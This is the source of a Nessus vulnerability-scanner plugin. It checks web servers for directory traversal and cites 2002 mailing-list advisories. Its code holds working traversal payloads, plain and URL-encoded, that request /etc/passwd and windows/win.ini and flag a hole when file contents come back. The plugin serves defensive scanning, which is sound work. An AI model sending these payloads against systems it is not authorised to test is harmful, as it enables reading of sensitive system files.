#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
# And hacked three years later by Michel Arboi...
#
# See the Nessus Scripts License for details
#
##############
# References:
##############
# Message-ID: <057801c26b19$529b2950$c64896d4@beyondmobile1>
# Date: Thu, 3 Oct 2002 22:12:31 +0200
# From: "Aviram Jenik" <aviram@BEYONDSECURITY.COM>
# Subject: BearShare Directory Traversal Issue Resurfaces
# To: win2ksecadvice@LISTSERV.NTSECURITY.NET
#
# Date: 25 Sep 2002 09:10:45 -0000
# Message-ID: <20020925091045.29313.qmail@mail.securityfocus.com>
# From: "DownBload" <downbload@hotmail.com>
# To: bugtraq@securityfocus.com
# Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
#
# From: "David Endler" <dendler@idefense.com>
# To:vulnwatch@vulnwatch.org
# Date: Mon, 23 Sep 2002 16:41:19 -0400
# Subject: iDEFENSE Security Advisory 09.23.2002: Directory Traversal in Dino's Webserver
#

if(description)
{
 script_id(10297);
 script_version ("$Revision: 1.10.2.2 $");
 
 name["english"] = "Web server traversal";
 name["francais"] = "Web server traversal";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It is possible to read arbitrary files on
the remote server by prepending ../../
or ..\..\ in front on the file name.

Solution : Use another web server
Risk factor : High";

 desc["francais"] = "Il est possible de lire
n'importe quel fichier sur la machine distante
en ajoutant des points devant leur noms,
tels que ../../ ou ..\..\.


Solution : dsactivez ce service et installez
un vrai serveur web.

Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "\..\..\file.txt";
 summary["francais"] = "\..\..\file.txt";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#
include("http_func.inc");

port = get_kb_item("Services/www");
if(!port)port = 80;

if(! get_port_state(port)) exit(0);

qc=1;
k = string("www/no404/", port);
if (get_kb_item(k)) qc=0;

i=0;
r[i] = string("..\\..\\..\\..\\..\\..\\windows\\win.ini");	i=i+1;
r[i] = string("..\\..\\..\\..\\..\\..\\winnt\\win.ini");	i=i+1;
r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin.ini";		i=i+1;
r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin%2eini";	i=i+1;
r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini";	i=i+1;
r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini";	i=i+1;
r[i] = 0;

for (i=0; r[i]; i=i+1)
{
  if (check_win_dir_trav(port: port, url: r[i], quickcheck: qc))
  {
    security_hole(port);
    exit(0);
  }
}

i=0;
r[i] = "../../../../../../etc/passwd";		i=i+1;
r[i] = "/../../../../../../../../../etc/passwd";	i=i+1;
r[i] = "//../../../../../../../../../etc/passwd";	i=i+1;
r[i] = 0;

for (i = 0; r[i]; i=i+1)
{
  req = http_get(item: r[i], port:port);
  soc = http_open_socket(port);
  if(! soc) exit(0);
  send(socket:soc, data:req);
  r = http_recv(socket:soc);
  http_close_socket(soc);
  if("root:" >< r)
  {
    security_hole(port);
    exit(0);
  }
}




